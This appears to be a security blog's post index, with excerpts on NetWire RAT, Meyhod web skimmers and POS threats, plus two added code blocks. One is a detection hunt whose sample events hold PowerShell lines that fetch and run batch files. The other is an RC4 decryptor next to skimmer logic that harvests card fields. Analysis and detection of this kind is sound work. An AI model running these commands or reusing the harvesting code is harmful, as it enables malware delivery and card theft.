Posts

AnyRun Christmas CTF

Keen-eyed Tweeps may have noticed that AnyRun tweeted out a Christmas CTF in their Xmas post card this year (see above). I enjoy a good CTF, and with some help from @KrabsOnSecurity we uncovered a code for a free trial of AnyRun Explorer (an account option which is not on the pricing page). The CTF started with the above tweet, which contains a QR code. Scanning the code with the built-in QR code scanner on my iPhone, the message appeared. I then chucked this into base64decode, as I have inspected enough malicious code to recognise when something is encoded this way. I got stuck here, as the decoded output does not look like any encoding or encryption scheme I have seen before. Luckily, @KrabsOnSecurity noticed that this is the ID for an AnyRun sample run. This revealed a glowing Christmas tree produced by a PowerShell script that, when downloaded, contained the code for the CTF. And voila! We earned ourselves a nice trial of AnyRun Explorer after a short CTF on Twitter. References: h

Analysis of the NetWire RAT campaign

Executive summary: Threat actors continue to leverage the NetWire Remote Access Trojan (RAT) in malicious spam email attacks using low-detection scripts, URL shorteners, and the Discord content delivery network (CDN). The infection chain begins with a targeted email from the t-online[.]de mail service. The emails carry an XLS file or ZIP archive that, if opened, triggers embedded VBScript and PowerShell scripts. The secondary stage uses URL shorteners in the PowerShell script to pull down a batch file from the attacker's server or from the Discord CDN. If the batch file executes successfully, the victim's device is infected with NetWire RAT and a connection is made to the command and control (C&C) server, from which post-exploitation activity can then be initiated. NetWire RAT is widely used off-the-shelf malware favoured by cybercriminal groups and Business Email Compromise (BEC) scammers. Its features include credential theft, audio recording, screen capture, and keystroke
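The delivery chain above (Office document, script host, PowerShell, batch file fetched via a URL shortener or the Discord CDN) is a good fit for a process-creation hunt. The following is an added example and not code from the original post or from the campaign analysis: it runs a few such checks over constructed process-creation events in a simplified parent|image|command-line format. The list of shortener domains, the Office and script-host process names, and the sample events are assumptions made for the illustration.

```python
"""Hunt over process-creation events for the NetWire delivery chain:
Office -> script host -> PowerShell fetching a .bat from a URL shortener
or the Discord CDN.  Added example; events and host lists are constructed."""
import re

# Assumed lists for the illustration: the shorteners are examples, not an
# inventory, and cdn.discordapp.com is the host the Discord CDN serves from.
URL_SHORTENERS = {"bit.ly", "tinyurl.com", "cutt.ly", "is.gd", "rb.gy", "t.ly"}
DISCORD_CDN = "cdn.discordapp.com"
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

URL_RE = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)   # captures the host
BAT_RE = re.compile(r"\.bat\b", re.IGNORECASE)

# Constructed sample events (parent|image|command line); not real telemetry.
SAMPLE_EVENTS = [
    'EXCEL.EXE|wscript.exe|wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\inv.vbs',
    'wscript.exe|powershell.exe|powershell.exe -w hidden -ep bypass -c "iwr '
    'https://cdn.discordapp.com/attachments/1/2/x.bat -o C:\\Temp\\x.bat; & C:\\Temp\\x.bat"',
    'explorer.exe|powershell.exe|powershell.exe -NoProfile Get-ChildItem',
    'EXCEL.EXE|powershell.exe|powershell.exe -nop -c "Invoke-WebRequest '
    'http://tinyurl.com/abcd12 -OutFile C:\\Temp\\upd.bat"',
]


def analyse(event):
    """Return the list of reasons an event looks like this chain (empty if clean)."""
    parent, image, cmdline = event.split("|", 2)
    parent, image = parent.lower(), image.lower()
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append("office-spawned-script-host")
    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        reasons.append("script-host-chained-powershell")
    for host in URL_RE.findall(cmdline):
        host = host.lower().split(":")[0]        # drop any :port
        if host in URL_SHORTENERS:
            reasons.append("url-shortener:" + host)
        elif host == DISCORD_CDN:
            reasons.append("discord-cdn-download")
    if image in SCRIPT_HOSTS and BAT_RE.search(cmdline):
        reasons.append("batch-payload")
    return reasons


def scan(events):
    """Run analyse() over every event; return (index, reasons) for the hits."""
    hits = []
    for idx, event in enumerate(events):
        reasons = analyse(event)
        if reasons:
            hits.append((idx, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].split("|")[1], reasons)
```

Each check on its own is noisy (PowerShell downloads from shorteners happen in legitimate automation), so the value is in the combination: an Office parent plus a script host plus a shortener or Discord CDN URL plus a `.bat` target is the shape described above, and the reasons list is what you would carry into the alert.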

Operational Security Tips and Tricks

For my last blog of 2020, I wanted to share a short checklist for users and researchers to keep themselves secure on the internet. Many attackers cast a wide net, and many of those who fail the basics get caught. Hopefully this guide will help those on the path to Operational Security (OPSEC). Social Media: Set social media accounts (e.g. Twitter, Facebook, Instagram, TikTok) to private. Avoid using your real name when creating accounts. Avoid using identifiable personal pictures for profile pictures and cover pictures. Leave bio details blank and avoid sharing identifiable information. Do not check in to locations or share your location in social media posts. Keep a vetted list of friends/contacts who are permitted to view your social media content. Finally, personnel who work in cleared positions often ask family members not to share pictures of them and to prevent tagging. Personal Security (PERSEC): Use more than one email account - ideally one for critical services like finances,

Analysis of Meyhod JavaScript Web Skimmers

A new web skimmer, dubbed Meyhod, has been disclosed by RiskIQ. The malware (named after a typo in the code) appeared in October on several e-commerce sites, including the hair treatment company Bosley and the Chicago Architecture Center (CAC). While investigating the attacker's domain (jquerycloud[.]com) a bit further, other potential victims from this campaign were uncovered some months ago. These include Doves Farm UK, The Fruit Company, Custom Earth Promos, and - judging by the file names - potentially iCanvas or TFC. Active compromise of dovesfarm.co.uk: Skimmer 1: Identifier - sClass="yeikyd" - 'dovesfarm.js' (available here). Skimmer 2: Identifier - sClass="frydbt" - 'icanvas.js' (available here). Skimmer 3: Identifier - sClass="bfiyad" - 'tfc.js' (available here). Skimmer 1 - Listener: Skimmers 2 and 3 - Listener: Skimmed Data: RC4 encryption: Data collected: Credit Card Number, Card Holder Name, CVV, expiry day, mont
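The post notes that the skimmed data is RC4-encrypted before it leaves the page, which is what an analyst has to undo when reading a captured payload. The block below is an added example, not the Meyhod code or anything from RiskIQ's report: it reimplements RC4 in plain JavaScript, shows how a skimmer of this shape would pick the card fields out of a submitted form and wrap them, and provides the matching decryptor. The key, the field-name regexes and the sample record are assumptions made for the illustration; the RC4 test vectors in the usage note are the standard published ones.

```javascript
// Added example: RC4 as used to wrap skimmed card data, plus the decryptor an
// analyst needs.  Illustrative reimplementation, not the skimmer's own code.
// Key, field patterns and the sample record are made up for the demo.
const enc = new TextEncoder();
const dec = new TextDecoder();

// Plain RC4 (KSA + PRGA).  Symmetric: the same call encrypts and decrypts.
function rc4(key, data) {
  const S = new Uint8Array(256);
  for (let i = 0; i < 256; i++) S[i] = i;
  let j = 0;
  for (let i = 0; i < 256; i++) {
    j = (j + S[i] + key[i % key.length]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
  }
  const out = new Uint8Array(data.length);
  let i = 0;
  j = 0;
  for (let k = 0; k < data.length; k++) {
    i = (i + 1) & 0xff;
    j = (j + S[i]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
    out[k] = data[k] ^ S[(S[i] + S[j]) & 0xff];
  }
  return out;
}

const toHex = (bytes) => Array.from(bytes, (b) => b.toString(16).padStart(2, '0')).join('');
const fromHex = (hex) => Uint8Array.from(hex.match(/../g), (h) => parseInt(h, 16));

// Convenience for checking against published RC4 test vectors.
function rc4Hex(keyStr, plaintextStr) {
  return toHex(rc4(enc.encode(keyStr), enc.encode(plaintextStr)));
}

// Skimmer side.  A real one hooks the form's submit event and reads the
// inputs; here the inputs are passed in as {name: value} and filtered by the
// same kind of name matching: card number, holder name, CVV, expiry.
// These patterns are assumed for the demo.
const FIELD_PATTERNS = {
  number: /card.?(number|num)|ccnum|pan/i,
  name:   /(holder|cardholder|name.?on)/i,
  cvv:    /cvv|cvc|csc/i,
  month:  /exp.?month|expiry.?m/i,
  year:   /exp.?year|expiry.?y/i,
};

function pickCardFields(inputs) {
  const record = {};
  for (const [label, re] of Object.entries(FIELD_PATTERNS)) {
    for (const [name, value] of Object.entries(inputs)) {
      if (re.test(name)) { record[label] = value; break; }
    }
  }
  return record;
}

function skimRecord(record, keyStr) {
  return toHex(rc4(enc.encode(keyStr), enc.encode(JSON.stringify(record))));
}

// Analyst side: given a captured hex blob and the key recovered from the
// skimmer script, get the record back.
function decryptRecord(hex, keyStr) {
  return JSON.parse(dec.decode(rc4(enc.encode(keyStr), fromHex(hex))));
}

// Constructed sample form post (not real data).
const SAMPLE_INPUTS = {
  'billing[card_number]': '4111111111111111',
  'billing[cardholder_name]': 'J Doe',
  'billing[cvv]': '123',
  'billing[exp_month]': '12',
  'billing[exp_year]': '2024',
  'billing[newsletter]': 'yes',
};
```

Use `rc4Hex('Key', 'Plaintext')` to confirm the primitive (it should return `bbf316e8d940af0ad3`, the published vector), then `decryptRecord(skimRecord(pickCardFields(SAMPLE_INPUTS), 'demo-key'), 'demo-key')` to round-trip the sample. Because RC4 has no key schedule worth the name, the key is always sitting in the skimmer source or in a constant it XORs together, so recovering it from the script is usually the only step between a captured blob and the cleartext.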

The Game of Attribution

In 1937, one of the world's most authoritative art historians, Abraham Bredius, was approached by a lawyer on behalf of a Dutch family estate to inspect a painting of Christ and the Disciples at Emmaus (pictured above). Bredius had dedicated many years of his life to studying the work of Johannes Vermeer. After inspecting the painting, he wrote that it was not only a Vermeer, but one of the greatest pieces Vermeer ever created. Han van Meegeren, a mediocre Dutch artist, had in fact forged the work. The piece was sold during WWII to Nazi Field Marshal Hermann Goering. Van Meegeren was charged as a Nazi collaborator, but claimed he was a national hero, because he had traded the forgery for 200 original Dutch paintings seized by Goering at the beginning of the war. To fool Abraham Bredius, the 83-year-old art historian whose word was taken as gospel, Van Meegeren had to lay as many clues (or false flags) as he could. This involved making a new painting look like it was o

Analysis of the threats targeting Point of Sale systems

Background: A point of sale (POS) system refers to the critical piece of software used by customers to execute a payment for goods or a service. This also includes the physical devices in stores, where POS terminals and systems are used to process card payments. These are often the primary targets of financially motivated organised cybercrime groups (also known as eCrime advanced persistent threats). Successful intrusion into a POS system can lead to the theft of vast amounts of customers' financial data, which can be used for immediate gain or sold on underground markets for fraud. A combination of hard-to-detect data-exfiltration malware, legacy hardware that is difficult to patch, and general OS vulnerabilities means that this particular threat is common and can be difficult to defend against. Organised cybercrime APT groups such as FIN6, FIN7, and FIN8 are currently some of the most significant threats to large retailers, restaurant chains, hotels, the leisure industry, and to